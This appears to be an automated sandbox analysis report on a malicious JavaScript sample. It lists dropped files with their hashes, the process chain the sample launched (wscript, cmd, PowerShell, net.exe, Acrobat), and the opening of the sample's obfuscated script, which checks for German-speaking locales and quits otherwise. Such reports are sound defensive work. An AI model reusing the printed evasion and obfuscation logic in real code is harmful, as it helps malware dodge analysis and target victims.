File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.659129083301999 |
Encrypted: | false |
SSDEEP: | 24:Yv6XvDkzvGamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSR:YvOYABgkDMUJUAh8cvMR |
MD5: | 1D6FD6531CE1A592289F0A69439AB777 |
SHA1: | 27C26D86300C1AEEF25BA1865EBE8E7B602A5731 |
SHA-256: | 86948916C784AFCB3F44856A0FE4EA3E234081ACCA0BCA21C84DD560FB3FFE3C |
SHA-512: | C62443F64571F407AEC0A68BC88D725EEBF6A5FCD8564B57996CBB4BB72653D299D43AC63F390C7D6E3451CA2CB5D4B6725433B32B2D85A23971854E315C2A2E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.272126567812338 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXb7EJiNHVoZcg1vRcR0YkU5EKoAvJfshHHrPeUkwRe9:YvXKXvDkZc0vGE5GUUUkee9 |
MD5: | 9FEC02CD2B7103AEA19C659AC06E7EA8 |
SHA1: | 5A417EC52D5AB1F16B3D8C14B7BC194A5BBA5F3D |
SHA-256: | 012043CBE943E295BC4FA71F2B55596888F962DE5B7CC3BB6756A3114398D050 |
SHA-512: | 9A715AC1FB2F2E02C69DFF9A9969C3CD4B1C5F61584A3D53E29B5FA8758DD475E2F288FD29A5C3615D23CC6C47E7FF0B5E33FBC76C1249CC7F0C06E39DBAA870 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.283811422259811 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXb7EJiNHVoZcg1vRcR0YkU5EKoAvJTqgFCrPeUkwRe9:YvXKXvDkZc0vGE5GTq16Ukee9 |
MD5: | 2C1029EE5A50A509F933906B6694C3CB |
SHA1: | B1C2D4DB13766B0B76E036E0EA8285228DF74087 |
SHA-256: | C28A47707E6888172D6A1A5E1534E47C5603A971D4C658C955F6CE5BA745CA31 |
SHA-512: | 2A1D6D56410A6BC28424B9A0471679B51FD384D382BDA4D213D1B534BD54D8AA48FBC00345101E6810868D91446FD809244250224D734461CF5449EDCC0ECFF3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.143134772007757 |
Encrypted: | false |
SSDEEP: | 24:YtpQ31Ma1hnayDEAxR5Mvfq6yvfPkke7jTwsj0ShuSV292LSjCcwWIalWOtni5Do:Yk7p0f9yva8+gKM5FwW3lKtb9sF |
MD5: | FAB92CF9AFBD2D6A8B346F01B5F3EF35 |
SHA1: | 58C824DA31CC265F7BADA7CB4F8044D5567A9160 |
SHA-256: | 58D77E2A1D050FCEE27FE897024A0BF46E86DBB90A86FC43397FF5FAEE5134FF |
SHA-512: | D0E2C436341AE80EB1C0C9993523C81DFAA48696CCD2214EDA3C82B0E8511E492F5B3FE196BA4A9986130F3DD3665E5A07B53EBCAB5976961E62B2E05E50202C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.1868691261403272 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msEHUUUUUUUUQrSvR9H9vxFGiDIAEkGVvp8D:lNVmswUUUUUUUUA+FGSIte |
MD5: | 3DA518762116AE80EEBEAE2BA22AC4A3 |
SHA1: | 46D59A1335F05C1E70BAFF0FBB1B8D1E51DEF410 |
SHA-256: | 0C0EE8E0DADAA433F75D210045D3CF626B0B27859105801A7C1CBF8F3B47D381 |
SHA-512: | 7420C4DCEA30799ADDC67713483750742391B1D08E829BB965013B9203FB20D2BDAD773383A68E88CE41A034DC9EBDB5304CF7B44C8BE9E5FBF36DC0F72A82B3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.6053880122153632 |
Encrypted: | false |
SSDEEP: | 48:7MUKUUUUUUUUUUQ/vR9H9vxFGiDIAEkGVvQqFl2GL7ms3:7gUUUUUUUUUUeFGSIteKVms3 |
MD5: | 97458C6ED4D5FCA7CFBF026B98767AE0 |
SHA1: | DE1AC14D7C95568ECCCBAC907BF8E6ECAACB4DB5 |
SHA-256: | 24C37B668C6B97E3CDA31B5F726C3D452BB8386451221AF76C031416508BFBD0 |
SHA-512: | FF4AD7F2E7475DA59CD49E2D60DA98308F26078BA3D2AA0C89081D3538C92F37E444F3139E4B854A50358078CD1955596EB235AE680E0A91B403F125154E4A85 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgYj7WYDTZX59pIkYTwiaVfTjOYyu:6a6TZ44ADEYj7pDTZX7RPOK |
MD5: | 88338934FFE4C3F799C81C8C3104587F |
SHA1: | A70D83E66D070EB5E0E9523DE399DDD4FBA529E5 |
SHA-256: | 56032F5D99E614CD664D8DDE72696B70EAAD0E7249D45F945AF4D35299F38409 |
SHA-512: | CDECBDCD96F56EFCD84EBDA99B7C73C8F9610115BCDA8E299DCF11F1957F9B4694F407CEFF658B7D4A94B44C2FF9F0C16A245EAD26DABCBDC57C71EEFF7B8DB0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1628158735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul5mxllp:NllU4x/ |
MD5: | 3A925CB766CE4286E251C26E90B55CE8 |
SHA1: | 3FA8EE6E901101A4661723B94D6C9309E281BD28 |
SHA-256: | 4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8 |
SHA-512: | F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.5085442896850614 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClEfCH:Qw946cPbiOxDlbYnuRK+bDfw |
MD5: | FD74FD8FFF34239C1386514CD31D635B |
SHA1: | 2384E57382B4435CFD50445F75378660C7E62056 |
SHA-256: | D5812355336F9EE7CB628895F18A464498E0B5A96AD3DF4ADB8B01791CA535ED |
SHA-512: | 60E3CBA53D09DA271DB25A4CC9E08DF0B269EC1CF73EADB143E44B53815E706ED3DCBE69BF14A66657799E6C74D40B7DEA15D74D6256730C07B3105C2C63B104 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 11-26-27-758.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.345946398610936 |
Encrypted: | false |
SSDEEP: | 384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW |
MD5: | 8947C10F5AB6CFFFAE64BCA79B5A0BE3 |
SHA1: | 70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778 |
SHA-256: | 4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485 |
SHA-512: | B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.382310047662033 |
Encrypted: | false |
SSDEEP: | 384:XCIzAKZ9cxxzRsF64+R42I2nbsVBygAp9GEiAIyVGtSBWe3zrbvfOVO3WQf3HsU2:pKW |
MD5: | 51DDE17613C75767C62DFD5CB16F0604 |
SHA1: | 00E07D8647906792AA3E94A0F6026CC366B0C2E9 |
SHA-256: | 7B2A7911AA7CA4906936B5DC203A6536F49DDEDD648451DF0C407875B46D92F3 |
SHA-512: | FD3D1A5857184CA89DB79B83E2735B95E7D2C35C9C4AB9779ED05DCEE6A8CA034B228E6F7A5519EED015652C63A82D65C48CE4D3484CB0AF281917CA58C7307A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.392440558314502 |
Encrypted: | false |
SSDEEP: | 768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rb:ck |
MD5: | 718491282E6407B7A519782B478C6944 |
SHA1: | 537E63D55FC65E9920CB0248621F4A350B7CC1E0 |
SHA-256: | DC7B4365113C34408B7CF3999574BCAF98232C7F8579123110E96CCF9162B495 |
SHA-512: | 8C976F2700C62906246E9600D4412C1F0012D31347447A53790C08A799657C8920762D6B7BB99296B98A94C514D8C0453AC76A155AD447C6D7BE170176726B6E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:GqA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:5VB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A9C99A0DD153B23D2C4DC943CC1567B4 |
SHA1: | B7B59DEEA23EDB8F8868D28D6BD67B20B21AFC58 |
SHA-256: | 2BAC328B0024285F5D0CC1407253D2C82EF65770FE5538FDB5863E05837D96D9 |
SHA-512: | 27873463B8DEB439C9550A0BD0FF2E4E46B2B3B485839BA25FFB17825A13D43C35C8BDD93A3239D9FAC408FB69EC15CA7D458A4A3D9DAFB29E7622BEBFC8CDA0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/M7ouWLaGZjZwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:RuWLaGZjZwZGk3mlind9i4ufFXpAXkru |
MD5: | AE1E8A5D3E7B2198980A0CA16DE5F3D3 |
SHA1: | A1DB2C58AFC81E6A114A8EB47BE0243956F79460 |
SHA-256: | 8C2E1B13F6658714D51737D6745FE065B87497923945AB3028706A4171C8328F |
SHA-512: | 5B36CF0982C5AFED5CCEA4B30A0B31A2B5312FBF5438623D53153E076B59F1B4BEF8C08695EA74E086BCA4EF7221889DB977B5DCFF4C684BA0683FDDECDE2EC4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.9263567514886075 |
TrID: | |
File name: | 199708044356824138.js |
File size: | 19'893 bytes |
MD5: | 0fda4b52ae1ca47c0a435f572caf8d3c |
SHA1: | 774fd46a50e42f292e00a83562e5406500a246b7 |
SHA256: | 99ec7e9a5573b60b00cfb0db19145b845a10e66dd375e927e7e0def34a76a65a |
SHA512: | ea0ebbf400371f437a5135a0ddafce5b79ff6695d7c51f961eb035e915f5ec2dc38028e5ae74b270ebb6764b4018abeb7162e93cc5b5964191122eb6d3aa8f52 |
SSDEEP: | 192:RlnwoL7m1qnZaZiRC2yxTMEu+u8ZIiNyBaIlfQ07xX2c+32pzDMlEdREkHs2Fayz:fwoL7EqZS92yNMFxVQczWcRNHsk8d7+ |
TLSH: | 89927685E92C9A81CEDC09E005EB3ED0528C51E68DA0D6C5F85FBA6247E0B50F7F87B5 |
File Content Preview: | function fdnfwp(){dxlhmyr=[1031,3079,5127,4103,2055,3072];var fmnrk=this[bljtk+rvzhcrzgk+rdfzrh+ctcnya+xyhjmivc+saxaswq+ejtjqzieo+plekzlegi](this[tmnikx+xrlsklvcn+sgtna+rdfzrh+raidx+bljtk+plekzlegi][yoxtfwgmn+rdfzrh+xyhjmivc+rvzhcrzgk+plekzlegi+xyhjmivc+d |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 11:26:19 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7d04a0000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 11:26:19 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62db50000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 11:26:19 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 11:26:19 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 11:26:24 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6bc1b0000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 5 |
Start time: | 11:26:24 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62db50000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 11:26:24 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7fe350000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 11:26:25 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 8 |
Start time: | 11:26:25 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6eef20000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 11:26:25 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function fdnfwp() { |
|
1 | dxlhmyr = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var fmnrk = this[bljtk + rvzhcrzgk + rdfzrh + ctcnya + xyhjmivc + saxaswq + ejtjqzieo + plekzlegi] ( this[tmnikx + xrlsklvcn + sgtna + rdfzrh + raidx + bljtk + plekzlegi][yoxtfwgmn + rdfzrh + xyhjmivc + rvzhcrzgk + plekzlegi + xyhjmivc + dcauhed + janlx + jadsd + xyhjmivc + sgtna + plekzlegi] ( tmnikx + xrlsklvcn + sgtna + rdfzrh + raidx + bljtk + plekzlegi + jvflxztax + xrlsklvcn + tklndn + xyhjmivc + tmypfwnj + tmypfwnj ) [cpaotezor + xyhjmivc + vhmirryi + cpaotezor + xyhjmivc + rvzhcrzgk + fpors] ( gjhpf + pduehuser + utxwucpiq + ubadkv + rvmsbqdg + yoxtfwgmn + xnyunlkwa + cpaotezor + cpaotezor + utxwucpiq + obwhac + eszhjnquf + rvmsbqdg + xnyunlkwa + xrlsklvcn + utxwucpiq + cpaotezor + xlwzjkdp + yoxtfwgmn + ntzbizt + ejtjqzieo + plekzlegi + rdfzrh + ntzbizt + tmypfwnj + uxaeprr + sxcrixjh + rvzhcrzgk + ejtjqzieo + xyhjmivc + tmypfwnj + xlwzjkdp + saxaswq + ejtjqzieo + plekzlegi + xyhjmivc + rdfzrh + ejtjqzieo + rvzhcrzgk + plekzlegi + raidx + ntzbizt + ejtjqzieo + rvzhcrzgk + tmypfwnj + xlwzjkdp + jliaiyt + ntzbizt + sgtna + rvzhcrzgk + tmypfwnj + xyhjmivc ), 16 ); |
|
3 | for ( xhnwvwqdw = 0 ; xhnwvwqdw < dxlhmyr[tmypfwnj + xyhjmivc + ejtjqzieo + vhmirryi + plekzlegi + tklndn] ; ++ xhnwvwqdw ) | |
4 | { | |
5 | if ( fmnrk == dxlhmyr[xhnwvwqdw] ) | |
6 | { | |
7 | fmnrk = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( fmnrk !== true ) | |
12 | this[tmnikx + xrlsklvcn + sgtna + rdfzrh + raidx + bljtk + plekzlegi][knmxli + mlqzj + raidx + plekzlegi] ( ); | |
